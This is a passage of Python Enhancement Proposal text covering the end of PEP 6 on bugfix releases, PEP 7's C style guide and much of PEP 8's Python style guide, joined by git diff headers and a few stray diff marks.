Where possible, bug fix releases should also:

1. Have no new features. The purpose of a bug fix release is to fix bugs, not add the latest and greatest whizzo feature from the HEAD of the CVS root.
2. Be a painless upgrade. Users should feel confident that an upgrade from 2.x.y to 2.x.(y+1) will not break their running systems. This means that, unless it is necessary to fix a bug, the standard library should not change behavior, or worse yet, APIs.

Applicability of Prohibitions

The above prohibitions and not-quite-prohibitions apply both for a final release to a bugfix release (for instance, 2.4 to 2.4.1) and for one bugfix release to the next in a series (for instance, 2.4.1 to 2.4.2).

Following the prohibitions listed in this PEP should help keep the community happy that a bug fix release is a painless and safe upgrade.

Helping the Bug Fix Releases Happen

Here are a few pointers on helping the bug fix release process along.

1. Backport bug fixes. If you fix a bug, and it seems appropriate, port it to the CVS branch for the current bug fix release. If you’re unwilling or unable to backport it yourself, make a note in the commit message, with words like ‘Bugfix candidate’ or ‘Backport candidate’.
2. If you’re not sure, ask. Ask the person managing the current bug fix releases if they think a particular fix is appropriate.
3. If there’s a particular bug you’d particularly like fixed in a bug fix release, jump up and down and try to get it done. Do not wait until 48 hours before a bug fix release is due, and then start asking for bug fixes to be included.

Version Numbers

Starting with Python 2.0, all major releases are required to have a version number of the form X.Y; bugfix releases will always be of the form X.Y.Z.

The current major release under development is referred to as release N; the just-released major version is referred to as N-1.

In CVS, the bug fix releases happen on a branch. For release 2.x, the branch is named ‘release2x-maint’. For example, the branch for the 2.3 maintenance releases is release23-maint.
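As an illustrative aside (not part of the original text), the two forms are easy to distinguish mechanically:

    import re

    # Major releases are "X.Y"; bugfix releases are "X.Y.Z".
    MAJOR = re.compile(r"^\d+\.\d+$")
    BUGFIX = re.compile(r"^\d+\.\d+\.\d+$")

    for version in ("2.4", "2.4.1"):
        if MAJOR.match(version):
            print(version, "-> major release")
        elif BUGFIX.match(version):
            print(version, "-> bugfix release")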

Procedure

The process for managing bugfix releases is modeled in part on the Tcl system [1].

The Patch Czar is the counterpart to the BDFL for bugfix releases. However, the BDFL and designated appointees retain veto power over individual patches. A Patch Czar might only be looking after a single branch of development - it’s quite possible that a different person might be maintaining the 2.3.x and the 2.4.x releases.

As individual patches get contributed to the current trunk of CVS, each patch committer is requested to consider whether the patch is a bug fix suitable for inclusion in a bugfix release. If the patch is considered suitable, the committer can either commit the patch to the maintenance branch, or else mark the patch in the commit message.

In addition, anyone from the Python community is free to suggest patches for inclusion. Patches may be submitted specifically for bugfix releases; they should follow the guidelines in PEP 3. In general, though, it’s probably better that a bug in a specific release also be fixed on the HEAD as well as the branch.

The Patch Czar decides when there are a sufficient number of patches to warrant a release. The release gets packaged up, including a Windows installer, and made public. If any new bugs are found, they must be fixed immediately and a new bugfix release publicized (with an incremented version number). For the 2.3.x cycle, the Patch Czar (Anthony) has been trying for a release approximately every six months, but this should not be considered binding in any way on any future releases.

Bug fix releases are expected to occur at an interval of roughly six months. This is only a guideline, however - obviously, if a major bug is found, a bugfix release may be appropriate sooner. In general, only the N-1 release will be under active maintenance at any time. That is, during Python 2.4’s development, Python 2.3 gets bugfix releases. If, however, someone qualified wishes to continue the work to maintain an older release, they should be encouraged.

Patch Czar History

Anthony Baxter is the Patch Czar for 2.3.1 through 2.3.4.

Barry Warsaw is the Patch Czar for 2.2.3.

Guido van Rossum is the Patch Czar for 2.2.2.

Michael Hudson is the Patch Czar for 2.2.1.

Anthony Baxter is the Patch Czar for 2.1.2 and 2.1.3.

Thomas Wouters is the Patch Czar for 2.1.1.

Moshe Zadka is the Patch Czar for 2.0.1.

History

This PEP started life as a proposal on comp.lang.python. The original version suggested a single patch for the N-1 release to be released concurrently with the N release. The original version also argued for sticking with a strict bug fix policy.

Following feedback from the BDFL and others, the draft PEP was written containing an expanded bugfix release cycle that permitted any previous major release to obtain patches and also relaxed the strict bug fix requirement (mainly due to the example of PEP 235, which could be argued as either a bug fix or a feature).

Discussion then mostly moved to python-dev, where the BDFL finally issued a proclamation basing the Python bugfix release process on Tcl’s, which essentially returned to the original proposal in terms of being only the N-1 release and only bug fixes, but allowing multiple bugfix releases until release N is published.

Anthony Baxter then took this PEP and revised it, based on lessons from the 2.3 release cycle.

References


Source: https://github.com/python/peps/blob/main/peps/pep-0006.rst

Last modified: 2023-11-28 14:46:07 GMT

diff --git a/pep-0007/index.html b/pep-0007/index.html

PEP 7 – Style Guide for C Code

Author: Guido van Rossum <guido at python.org>, Barry Warsaw <barry at python.org>
Status: Active
Type: Process
Created: 05-Jul-2001
Post-History:

Introduction

This document gives coding conventions for the C code comprising the C implementation of Python. Please see the companion informational PEP describing style guidelines for Python code.

Note, rules are there to be broken. Two good reasons to break a particular rule:

1. When applying the rule would make the code less readable, even for someone who is used to reading code that follows the rules.
2. To be consistent with surrounding code that also breaks it (maybe for historic reasons) – although this is also an opportunity to clean up someone else’s mess (in true XP style).

C dialect

• Python 3.11 and newer versions use C11 without optional features. The public C API should be compatible with C++.
• Python 3.6 to 3.10 use C89 with several select C99 features:
  • Standard integer types in <stdint.h> and <inttypes.h>. We require the fixed width integer types.
  • static inline functions
  • designated initializers (especially nice for type declarations)
  • intermingled declarations
  • booleans
  • C++-style line comments
• Python versions before 3.6 used ANSI/ISO standard C (the 1989 version of the standard). This meant (amongst many other things) that all declarations must be at the top of a block (not necessarily at the top of a function).
• Don’t use compiler-specific extensions, such as those of GCC or MSVC (e.g. don’t write multi-line strings without trailing backslashes).
• All function declarations and definitions must use full prototypes (i.e. specify the types of all arguments).
• No compiler warnings with major compilers (gcc, VC++, a few others).
• static inline functions should be preferred over macros in new code.

Code lay-out

• Use 4-space indents and no tabs at all.
• No line should be longer than 79 characters. If this and the previous rule together don’t give you enough room to code, your code is too complicated – consider using subroutines.
• No line should end in whitespace. If you think you need significant trailing whitespace, think again – somebody’s editor might delete it as a matter of routine.
• Function definition style: function name in column 1, outermost curly braces in column 1, blank line after local variable declarations.

  static int
  extra_ivars(PyTypeObject *type, PyTypeObject *base)
  {
      int t_size = PyType_BASICSIZE(type);
      int b_size = PyType_BASICSIZE(base);

      assert(t_size >= b_size); /* type smaller than base! */
      ...
      return 1;
  }

• Code structure: one space between keywords like if, for and the following left paren; no spaces inside the paren; braces are required everywhere, even where C permits them to be omitted, but do not add them to code you are not otherwise modifying. All new C code requires braces. Braces should be formatted as shown:

  if (mro != NULL) {
      ...
  }
  else {
      ...
  }

• The return statement should not get redundant parentheses:

  return(albatross); /* incorrect */

  Instead:

  return albatross; /* correct */

• Function and macro call style: foo(a, b, c) – no space before the open paren, no spaces inside the parens, no spaces before commas, one space after each comma.
• Always put spaces around assignment, Boolean and comparison operators. In expressions using a lot of operators, add spaces around the outermost (lowest-priority) operators.
• Breaking long lines: if you can, break after commas in the outermost argument list. Always indent continuation lines appropriately, e.g.:

  PyErr_Format(PyExc_TypeError,
               "cannot create '%.100s' instances",
               type->tp_name);

• When you break a long expression at a binary operator, braces should be formatted as shown:

  if (type->tp_dictoffset != 0
      && base->tp_dictoffset == 0
      && type->tp_dictoffset == b_size
      && (size_t)t_size == b_size + sizeof(PyObject *))
  {
      return 0; /* "Forgive" adding a __dict__ only */
  }

  It’s OK to put operators at ends of lines, especially to be consistent with surrounding code. (See PEP 8 for a longer discussion.)

• Vertically align line continuation characters in multi-line macros.
• Macros intended to be used as a statement should use the do { ... } while (0) macro idiom, without a final semicolon. Example:

  #define ADD_INT_MACRO(MOD, INT)                                   \
      do {                                                          \
          if (PyModule_AddIntConstant((MOD), (#INT), (INT)) < 0) {  \
              goto error;                                           \
          }                                                         \
      } while (0)

  // To be used like a statement with a semicolon:
  ADD_INT_MACRO(m, SOME_CONSTANT);

• #undef file local macros after use.
• Put blank lines around functions, structure definitions, and major sections inside functions.
• Comments go before the code they describe.
• All functions and global variables should be declared static unless they are to be part of a published interface.
• For external functions and variables, we always have a declaration in an appropriate header file in the “Include” directory, which uses the PyAPI_FUNC() macro and PyAPI_DATA() macro, like this:

  PyAPI_FUNC(PyObject *) PyObject_Repr(PyObject *);

  PyAPI_DATA(PyTypeObject) PySuper_Type;

Naming conventions

• Use a Py prefix for public functions; never for static functions. The Py_ prefix is reserved for global service routines like Py_FatalError; specific groups of routines (e.g. specific object type APIs) use a longer prefix, e.g. PyString_ for string functions.
• Public functions and variables use MixedCase with underscores, like this: PyObject_GetAttr, Py_BuildValue, PyExc_TypeError.
• Occasionally an “internal” function has to be visible to the loader; we use the _Py prefix for this, e.g.: _PyObject_Dump.
• Macros should have a MixedCase prefix and then use upper case, for example: PyString_AS_STRING, Py_PRINT_RAW.
• Macro parameters should use ALL_CAPS style, so they are easily distinguishable from C variables and struct members.

Documentation Strings

• Use the PyDoc_STR() or PyDoc_STRVAR() macro for docstrings to support building Python without docstrings (./configure --without-doc-strings).
• The first line of each function docstring should be a “signature line” that gives a brief synopsis of the arguments and return value. For example:

  PyDoc_STRVAR(myfunction__doc__,
  "myfunction(name, value) -> bool\n\n\
  Determine whether name and value make a valid pair.");

  Always include a blank line between the signature line and the text of the description.

  If the return value for the function is always None (because there is no meaningful return value), do not include the indication of the return type.

• When writing multi-line docstrings, be sure to always use backslash continuations, as in the example above, or string literal concatenation:

  PyDoc_STRVAR(myfunction__doc__,
  "myfunction(name, value) -> bool\n\n"
  "Determine whether name and value make a valid pair.");

  Though some C compilers accept string literals without either:

  /* BAD -- don't do this! */
  PyDoc_STRVAR(myfunction__doc__,
  "myfunction(name, value) -> bool\n\n
  Determine whether name and value make a valid pair.");

  not all do; the MSVC compiler is known to complain about this.

Source: https://github.com/python/peps/blob/main/peps/pep-0007.rst

Last modified: 2024-09-09 14:02:27 GMT

diff --git a/pep-0008/index.html b/pep-0008/index.html

PEP 8 – Style Guide for Python Code

Author: Guido van Rossum <guido at python.org>, Barry Warsaw <barry at python.org>, Alyssa Coghlan <ncoghlan at gmail.com>
Status: Active
Type: Process
Created: 05-Jul-2001
Post-History: 05-Jul-2001, 01-Aug-2013

Introduction

This document gives coding conventions for the Python code comprising the standard library in the main Python distribution. Please see the companion informational PEP describing style guidelines for the C code in the C implementation of Python.

This document and PEP 257 (Docstring Conventions) were adapted from Guido’s original Python Style Guide essay, with some additions from Barry’s style guide [2].

This style guide evolves over time as additional conventions are identified and past conventions are rendered obsolete by changes in the language itself.

Many projects have their own coding style guidelines. In the event of any conflicts, such project-specific guides take precedence for that project.

A Foolish Consistency is the Hobgoblin of Little Minds

One of Guido’s key insights is that code is read much more often than it is written. The guidelines provided here are intended to improve the readability of code and make it consistent across the wide spectrum of Python code. As PEP 20 says, “Readability counts”.

A style guide is about consistency. Consistency with this style guide is important. Consistency within a project is more important. Consistency within one module or function is the most important.

However, know when to be inconsistent – sometimes style guide recommendations just aren’t applicable. When in doubt, use your best judgment. Look at other examples and decide what looks best. And don’t hesitate to ask!

In particular: do not break backwards compatibility just to comply with this PEP!

Some other good reasons to ignore a particular guideline:

1. When applying the guideline would make the code less readable, even for someone who is used to reading code that follows this PEP.
2. To be consistent with surrounding code that also breaks it (maybe for historic reasons) – although this is also an opportunity to clean up someone else’s mess (in true XP style).
3. Because the code in question predates the introduction of the guideline and there is no other reason to be modifying that code.
4. When the code needs to remain compatible with older versions of Python that don’t support the feature recommended by the style guide.

Code Lay-out


Indentation

Use 4 spaces per indentation level.

Continuation lines should align wrapped elements either vertically using Python’s implicit line joining inside parentheses, brackets and braces, or using a hanging indent [1]. When using a hanging indent the following should be considered; there should be no arguments on the first line and further indentation should be used to clearly distinguish itself as a continuation line:

# Correct:

# Aligned with opening delimiter.
foo = long_function_name(var_one, var_two,
                         var_three, var_four)

# Add 4 spaces (an extra level of indentation) to distinguish arguments from the rest.
def long_function_name(
        var_one, var_two, var_three,
        var_four):
    print(var_one)

# Hanging indents should add a level.
foo = long_function_name(
    var_one, var_two,
    var_three, var_four)

# Wrong:

# Arguments on first line forbidden when not using vertical alignment.
foo = long_function_name(var_one, var_two,
    var_three, var_four)

# Further indentation required as indentation is not distinguishable.
def long_function_name(
    var_one, var_two, var_three,
    var_four):
    print(var_one)

The 4-space rule is optional for continuation lines.

Optional:

# Hanging indents *may* be indented to other than 4 spaces.
foo = long_function_name(
  var_one, var_two,
  var_three, var_four)

When the conditional part of an if-statement is long enough to require that it be written across multiple lines, it’s worth noting that the combination of a two-character keyword (i.e. if), plus a single space, plus an opening parenthesis creates a natural 4-space indent for the subsequent lines of the multiline conditional. This can produce a visual conflict with the indented suite of code nested inside the if-statement, which would also naturally be indented to 4 spaces. This PEP takes no explicit position on how (or whether) to further visually distinguish such conditional lines from the nested suite inside the if-statement. Acceptable options in this situation include, but are not limited to:

# No extra indentation.
if (this_is_one_thing and
    that_is_another_thing):
    do_something()

# Add a comment, which will provide some distinction in editors
# supporting syntax highlighting.
if (this_is_one_thing and
    that_is_another_thing):
    # Since both conditions are true, we can frobnicate.
    do_something()

# Add some extra indentation on the conditional continuation line.
if (this_is_one_thing
        and that_is_another_thing):
    do_something()

(Also see the discussion of whether to break before or after binary operators below.)

The closing brace/bracket/parenthesis on multiline constructs may either line up under the first non-whitespace character of the last line of the list, as in:

my_list = [
    1, 2, 3,
    4, 5, 6,
    ]
result = some_function_that_takes_arguments(
    'a', 'b', 'c',
    'd', 'e', 'f',
    )

or it may be lined up under the first character of the line that starts the multiline construct, as in:

my_list = [
    1, 2, 3,
    4, 5, 6,
]
result = some_function_that_takes_arguments(
    'a', 'b', 'c',
    'd', 'e', 'f',
)
+

Tabs or Spaces?

Spaces are the preferred indentation method.

Tabs should be used solely to remain consistent with code that is already indented with tabs.

Python disallows mixing tabs and spaces for indentation.

Maximum Line Length

Limit all lines to a maximum of 79 characters.

For flowing long blocks of text with fewer structural restrictions (docstrings or comments), the line length should be limited to 72 characters.

Limiting the required editor window width makes it possible to have several files open side by side, and works well when using code review tools that present the two versions in adjacent columns.

The default wrapping in most tools disrupts the visual structure of the code, making it more difficult to understand. The limits are chosen to avoid wrapping in editors with the window width set to 80, even if the tool places a marker glyph in the final column when wrapping lines. Some web based tools may not offer dynamic line wrapping at all.

Some teams strongly prefer a longer line length. For code maintained exclusively or primarily by a team that can reach agreement on this issue, it is okay to increase the line length limit up to 99 characters, provided that comments and docstrings are still wrapped at 72 characters.

The Python standard library is conservative and requires limiting lines to 79 characters (and docstrings/comments to 72).

The preferred way of wrapping long lines is by using Python’s implied line continuation inside parentheses, brackets and braces. Long lines can be broken over multiple lines by wrapping expressions in parentheses. These should be used in preference to using a backslash for line continuation.

Backslashes may still be appropriate at times. For example, long, multiple with-statements could not use implicit continuation before Python 3.10, so backslashes were acceptable for that case:

with open('/path/to/some/file/you/want/to/read') as file_1, \
     open('/path/to/some/file/being/written', 'w') as file_2:
    file_2.write(file_1.read())

(See the previous discussion on multiline if-statements for further thoughts on the indentation of such multiline with-statements.)

Another such case is with assert statements.

Make sure to indent the continued line appropriately.

Should a Line Break Before or After a Binary Operator?

For decades the recommended style was to break after binary operators. But this can hurt readability in two ways: the operators tend to get scattered across different columns on the screen, and each operator is moved away from its operand and onto the previous line. Here, the eye has to do extra work to tell which items are added and which are subtracted:

# Wrong:
# operators sit far away from their operands
income = (gross_wages +
          taxable_interest +
          (dividends - qualified_dividends) -
          ira_deduction -
          student_loan_interest)

To solve this readability problem, mathematicians and their publishers follow the opposite convention. Donald Knuth explains the traditional rule in his Computers and Typesetting series: “Although formulas within a paragraph always break after binary operations and relations, displayed formulas always break before binary operations” [3].

Following the tradition from mathematics usually results in more readable code:

# Correct:
# easy to match operators with operands
income = (gross_wages
          + taxable_interest
          + (dividends - qualified_dividends)
          - ira_deduction
          - student_loan_interest)

In Python code, it is permissible to break before or after a binary operator, as long as the convention is consistent locally. For new code Knuth’s style is suggested.

Blank Lines

Surround top-level function and class definitions with two blank lines.

Method definitions inside a class are surrounded by a single blank line.

Extra blank lines may be used (sparingly) to separate groups of related functions. Blank lines may be omitted between a bunch of related one-liners (e.g. a set of dummy implementations).

Use blank lines in functions, sparingly, to indicate logical sections.

Python accepts the control-L (i.e. ^L) form feed character as whitespace; many tools treat these characters as page separators, so you may use them to separate pages of related sections of your file. Note, some editors and web-based code viewers may not recognize control-L as a form feed and will show another glyph in its place.
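Putting those rules together, a module might be laid out as follows (the names are illustrative only):

def top_level_function():
    """Top-level definitions are separated by two blank lines."""
    return 42


class MyClass:
    """Methods inside a class are separated by one blank line."""

    def first_method(self):
        return 1

    def second_method(self):
        return 2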

Source File Encoding

Code in the core Python distribution should always use UTF-8, and should not have an encoding declaration.

In the standard library, non-UTF-8 encodings should be used only for test purposes. Use non-ASCII characters sparingly, preferably only to denote places and human names. If using non-ASCII characters as data, avoid noisy Unicode characters like z̯̯͡a̧͎̺l̡͓̫g̹̲o̡̼̘ and byte order marks.

All identifiers in the Python standard library MUST use ASCII-only identifiers, and SHOULD use English words wherever feasible (in many cases, abbreviations and technical terms are used which aren’t English).

Open source projects with a global audience are encouraged to adopt a similar policy.

Imports

• Imports should usually be on separate lines:

  # Correct:
  import os
  import sys

  # Wrong:
  import sys, os

  It’s okay to say this though:

  # Correct:
  from subprocess import Popen, PIPE

• Imports are always put at the top of the file, just after any module comments and docstrings, and before module globals and constants.

  Imports should be grouped in the following order:

  1. Standard library imports.
  2. Related third party imports.
  3. Local application/library specific imports.

  You should put a blank line between each group of imports, as illustrated after this list.

• Absolute imports are recommended, as they are usually more readable and tend to be better behaved (or at least give better error messages) if the import system is incorrectly configured (such as when a directory inside a package ends up on sys.path):

  import mypkg.sibling
  from mypkg import sibling
  from mypkg.sibling import example

  However, explicit relative imports are an acceptable alternative to absolute imports, especially when dealing with complex package layouts where using absolute imports would be unnecessarily verbose:

  from . import sibling
  from .sibling import example

  Standard library code should avoid complex package layouts and always use absolute imports.

• When importing a class from a class-containing module, it’s usually okay to spell this:

  from myclass import MyClass
  from foo.bar.yourclass import YourClass

  If this spelling causes local name clashes, then spell them explicitly:

  import myclass
  import foo.bar.yourclass

  and use myclass.MyClass and foo.bar.yourclass.YourClass.

• Wildcard imports (from <module> import *) should be avoided, as they make it unclear which names are present in the namespace, confusing both readers and many automated tools. There is one defensible use case for a wildcard import, which is to republish an internal interface as part of a public API (for example, overwriting a pure Python implementation of an interface with the definitions from an optional accelerator module; exactly which definitions will be overwritten isn’t known in advance).

  When republishing names this way, the guidelines below regarding public and internal interfaces still apply.
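Combining the grouping rule with the one-import-per-line rule, an import block might look like this (the third-party and local package names are hypothetical):

# Standard library imports.
import os
import sys

# Related third party imports.
import requests  # hypothetical third-party dependency

# Local application/library specific imports.
from myapp import utils  # hypothetical local package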

Module Level Dunder Names

Module level “dunders” (i.e. names with two leading and two trailing underscores) such as __all__, __author__, __version__, etc. should be placed after the module docstring but before any import statements except from __future__ imports. Python mandates that future-imports must appear in the module before any other code except docstrings:

"""This is the example module.

This module does stuff.
"""

from __future__ import barry_as_FLUFL

__all__ = ['a', 'b', 'c']
__version__ = '0.1'
__author__ = 'Cardinal Biggles'

import os
import sys

String Quotes

In Python, single-quoted strings and double-quoted strings are the same. This PEP does not make a recommendation for this. Pick a rule and stick to it. When a string contains single or double quote characters, however, use the other one to avoid backslashes in the string. It improves readability.

For triple-quoted strings, always use double quote characters to be consistent with the docstring convention in PEP 257.
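A short sketch of both conventions (the strings themselves are made up):

# Pick the quote character that avoids backslashes in the string:
note = "don't escape the apostrophe"
quote = 'she said "hello"'


def greet():
    """Triple-quoted strings use double quotes, per PEP 257."""
    return note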

Whitespace in Expressions and Statements


Pet Peeves

Avoid extraneous whitespace in the following situations:

• Immediately inside parentheses, brackets or braces:

  # Correct:
  spam(ham[1], {eggs: 2})

  # Wrong:
  spam( ham[ 1 ], { eggs: 2 } )

• Between a trailing comma and a following close parenthesis:

  # Correct:
  foo = (0,)

  # Wrong:
  bar = (0, )

• Immediately before a comma, semicolon, or colon:

  # Correct:
  if x == 4: print(x, y); x, y = y, x

  # Wrong:
  if x == 4 : print(x , y) ; x , y = y , x

• However, in a slice the colon acts like a binary operator, and should have equal amounts on either side (treating it as the operator with the lowest priority). In an extended slice, both colons must have the same amount of spacing applied. Exception: when a slice parameter is omitted, the space is omitted:

  # Correct:
  ham[1:9], ham[1:9:3], ham[:9:3], ham[1::3], ham[1:9:]
  ham[lower:upper], ham[lower:upper:], ham[lower::step]
  ham[lower+offset : upper+offset]
  ham[: upper_fn(x) : step_fn(x)], ham[:: step_fn(x)]
  ham[lower + offset : upper + offset]

  # Wrong:
  ham[lower + offset:upper + offset]
  ham[1: 9], ham[1 :9], ham[1:9 :3]
  ham[lower : : step]
  ham[ : upper]

• Immediately before the open parenthesis that starts the argument list of a function call:

  # Correct:
  spam(1)

  # Wrong:
  spam (1)

• Immediately before the open parenthesis that starts an indexing or slicing:

  # Correct:
  dct['key'] = lst[index]

  # Wrong:
  dct ['key'] = lst [index]

• More than one space around an assignment (or other) operator to align it with another:

  # Correct:
  x = 1
  y = 2
  long_variable = 3

  # Wrong:
  x             = 1
  y             = 2
  long_variable = 3

Other Recommendations

+
    +
  • Avoid trailing whitespace anywhere. Because it’s usually invisible, +it can be confusing: e.g. a backslash followed by a space and a +newline does not count as a line continuation marker. Some editors +don’t preserve it and many projects (like CPython itself) have +pre-commit hooks that reject it.
  • +
  • Always surround these binary operators with a single space on either +side: assignment (=), augmented assignment (+=, -= +etc.), comparisons (==, <, >, !=, <>, <=, +>=, in, not in, is, is not), Booleans (and, +or, not).
  • If operators with different priorities are used, consider adding whitespace around the operators with the lowest priority(ies). Use your own judgment; however, never use more than one space, and always have the same amount of whitespace on both sides of a binary operator:

    # Correct:
    i = i + 1
    submitted += 1
    x = x*2 - 1
    hypot2 = x*x + y*y
    c = (a+b) * (a-b)

    # Wrong:
    i=i+1
    submitted +=1
    x = x * 2 - 1
    hypot2 = x * x + y * y
    c = (a + b) * (a - b)
  • Function annotations should use the normal rules for colons and always have spaces around the -> arrow if present. (See Function Annotations below for more about function annotations.):

    # Correct:
    def munge(input: AnyStr): ...
    def munge() -> PosInt: ...

    # Wrong:
    def munge(input:AnyStr): ...
    def munge()->PosInt: ...
  • Don’t use spaces around the = sign when used to indicate a keyword argument, or when used to indicate a default value for an unannotated function parameter:

    # Correct:
    def complex(real, imag=0.0):
        return magic(r=real, i=imag)

    # Wrong:
    def complex(real, imag = 0.0):
        return magic(r = real, i = imag)

    When combining an argument annotation with a default value, however, do use spaces around the = sign:

    # Correct:
    def munge(sep: AnyStr = None): ...
    def munge(input: AnyStr, sep: AnyStr = None, limit=1000): ...

    # Wrong:
    def munge(input: AnyStr=None): ...
    def munge(input: AnyStr, limit = 1000): ...
  • Compound statements (multiple statements on the same line) are generally discouraged:

    # Correct:
    if foo == 'blah':
        do_blah_thing()
    do_one()
    do_two()
    do_three()

    Rather not:

    # Wrong:
    if foo == 'blah': do_blah_thing()
    do_one(); do_two(); do_three()
  • While sometimes it’s okay to put an if/for/while with a small body on the same line, never do this for multi-clause statements. Also avoid folding such long lines!

    Rather not:

    # Wrong:
    if foo == 'blah': do_blah_thing()
    for x in lst: total += x
    while t < 10: t = delay()

    Definitely not:

    # Wrong:
    if foo == 'blah': do_blah_thing()
    else: do_non_blah_thing()

    try: something()
    finally: cleanup()

    do_one(); do_two(); do_three(long, argument,
                                 list, like, this)

    if foo == 'blah': one(); two(); three()

When to Use Trailing Commas

Trailing commas are usually optional, except they are mandatory when making a tuple of one element. For clarity, it is recommended to surround the latter in (technically redundant) parentheses:

# Correct:
FILES = ('setup.cfg',)

# Wrong:
FILES = 'setup.cfg',

When trailing commas are redundant, they are often helpful when a version control system is used, when a list of values, arguments or imported items is expected to be extended over time. The pattern is to put each value (etc.) on a line by itself, always adding a trailing comma, and add the close parenthesis/bracket/brace on the next line. However it does not make sense to have a trailing comma on the same line as the closing delimiter (except in the above case of singleton tuples):

# Correct:
FILES = [
    'setup.cfg',
    'tox.ini',
    ]
initialize(FILES,
           error=True,
           )

# Wrong:
FILES = ['setup.cfg', 'tox.ini',]
initialize(FILES, error=True,)

Comments

Comments that contradict the code are worse than no comments. Always make a priority of keeping the comments up-to-date when the code changes!

Comments should be complete sentences. The first word should be capitalized, unless it is an identifier that begins with a lower case letter (never alter the case of identifiers!).

Block comments generally consist of one or more paragraphs built out of complete sentences, with each sentence ending in a period.

You should use one or two spaces after a sentence-ending period in multi-sentence comments, except after the final sentence.

Ensure that your comments are clear and easily understandable to other speakers of the language you are writing in.

Python coders from non-English speaking countries: please write your comments in English, unless you are 120% sure that the code will never be read by people who don’t speak your language.

Block Comments

Block comments generally apply to some (or all) code that follows them, and are indented to the same level as that code. Each line of a block comment starts with a # and a single space (unless it is indented text inside the comment).

Paragraphs inside a block comment are separated by a line containing a single #.
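
A short sketch of these conventions (the code around the comment is invented for illustration):

width = 300

# Shrink the drawable area to account for the border.  The same
# offset applies to both axes.
#
# A line containing a single "#" separates comment paragraphs.
width = width - 2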

Inline Comments

Use inline comments sparingly.

An inline comment is a comment on the same line as a statement. Inline comments should be separated by at least two spaces from the statement. They should start with a # and a single space.

Inline comments are unnecessary and in fact distracting if they state the obvious. Don’t do this:

x = x + 1                 # Increment x

But sometimes, this is useful:

x = x + 1                 # Compensate for border

Documentation Strings

Conventions for writing good documentation strings (a.k.a. “docstrings”) are immortalized in PEP 257.

  • Write docstrings for all public modules, functions, classes, and methods. Docstrings are not necessary for non-public methods, but you should have a comment that describes what the method does. This comment should appear after the def line (see the sketch after this list).
  • PEP 257 describes good docstring conventions. Note that most importantly, the """ that ends a multiline docstring should be on a line by itself:

    """Return a foobang

    Optional plotz says to frobnicate the bizbaz first.
    """
  • For one liner docstrings, please keep the closing """ on the same line:

    """Return an ex-parrot."""
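
As a sketch of the first guideline above (the class and its methods are invented for illustration):

class Spam:
    def frobnicate(self):
        """Public method, so it gets a docstring."""

    def _squelch(self):
        # Non-public method: a comment after the def line is enough.
        ...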

Naming Conventions

The naming conventions of Python’s library are a bit of a mess, so we’ll never get this completely consistent – nevertheless, here are the currently recommended naming standards. New modules and packages (including third party frameworks) should be written to these standards, but where an existing library has a different style, internal consistency is preferred.

Overriding Principle

Names that are visible to the user as public parts of the API should follow conventions that reflect usage rather than implementation.

Descriptive: Naming Styles

There are a lot of different naming styles. It helps to be able to recognize what naming style is being used, independently from what they are used for.

The following naming styles are commonly distinguished:

  • b (single lowercase letter)
  • B (single uppercase letter)
  • lowercase
  • lower_case_with_underscores
  • UPPERCASE
  • UPPER_CASE_WITH_UNDERSCORES
  • CapitalizedWords (or CapWords, or CamelCase – so named because of the bumpy look of its letters [4]). This is also sometimes known as StudlyCaps.

    Note: When using acronyms in CapWords, capitalize all the letters of the acronym. Thus HTTPServerError is better than HttpServerError.

  • mixedCase (differs from CapitalizedWords by initial lowercase character!)
  • Capitalized_Words_With_Underscores (ugly!)

There’s also the style of using a short unique prefix to group related names together. This is not used much in Python, but it is mentioned for completeness. For example, the os.stat() function returns a tuple whose items traditionally have names like st_mode, st_size, st_mtime and so on. (This is done to emphasize the correspondence with the fields of the POSIX system call struct, which helps programmers familiar with that.)
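
For instance:

import os

st = os.stat('.')
print(st.st_mode, st.st_size, st.st_mtime)   # the st_ prefix groups the fields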

The X11 library uses a leading X for all its public functions. In Python, this style is generally deemed unnecessary because attribute and method names are prefixed with an object, and function names are prefixed with a module name.

In addition, the following special forms using leading or trailing underscores are recognized (these can generally be combined with any case convention):

  • _single_leading_underscore: weak “internal use” indicator. E.g. from M import * does not import objects whose names start with an underscore.
  • single_trailing_underscore_: used by convention to avoid conflicts with Python keyword, e.g.:

    tkinter.Toplevel(master, class_='ClassName')

  • __double_leading_underscore: when naming a class attribute, invokes name mangling (inside class FooBar, __boo becomes _FooBar__boo; see below).
  • __double_leading_and_trailing_underscore__: “magic” objects or attributes that live in user-controlled namespaces. E.g. __init__, __import__ or __file__. Never invent such names; only use them as documented.

Prescriptive: Naming Conventions


Names to Avoid

Never use the characters ‘l’ (lowercase letter el), ‘O’ (uppercase letter oh), or ‘I’ (uppercase letter eye) as single character variable names.

In some fonts, these characters are indistinguishable from the numerals one and zero. When tempted to use ‘l’, use ‘L’ instead.

ASCII Compatibility

Identifiers used in the standard library must be ASCII compatible as described in the policy section of PEP 3131.

Package and Module Names

Modules should have short, all-lowercase names. Underscores can be used in the module name if it improves readability. Python packages should also have short, all-lowercase names, although the use of underscores is discouraged.

When an extension module written in C or C++ has an accompanying Python module that provides a higher level (e.g. more object oriented) interface, the C/C++ module has a leading underscore (e.g. _socket).

Class Names


Class names should normally use the CapWords convention.

The naming convention for functions may be used instead in cases where the interface is documented and used primarily as a callable.

Note that there is a separate convention for builtin names: most builtin names are single words (or two words run together), with the CapWords convention used only for exception names and builtin constants.

Type Variable Names

Names of type variables introduced in PEP 484 should normally use CapWords preferring short names: T, AnyStr, Num. It is recommended to add suffixes _co or _contra to the variables used to declare covariant or contravariant behavior correspondingly:

from typing import TypeVar

VT_co = TypeVar('VT_co', covariant=True)
KT_contra = TypeVar('KT_contra', contravariant=True)

Exception Names

Because exceptions should be classes, the class naming convention applies here. However, you should use the suffix “Error” on your exception names (if the exception actually is an error).
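
For example (both class names are invented for illustration; the second shows a non-error exception used for signaling, which needs no suffix):

class FrobnicationError(Exception):
    """Raised when the bizbaz cannot be frobnicated (an error)."""

class Found(Exception):
    """Signals a successful search during non-local flow control."""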

Global Variable Names

(Let’s hope that these variables are meant for use inside one module only.) The conventions are about the same as those for functions.

Modules that are designed for use via from M import * should use the __all__ mechanism to prevent exporting globals, or use the older convention of prefixing such globals with an underscore (which you might want to do to indicate these globals are “module non-public”).

Function and Variable Names

Function names should be lowercase, with words separated by underscores as necessary to improve readability.

Variable names follow the same convention as function names.

mixedCase is allowed only in contexts where that’s already the prevailing style (e.g. threading.py), to retain backwards compatibility.

Function and Method Arguments


Always use self for the first argument to instance methods.


Always use cls for the first argument to class methods.


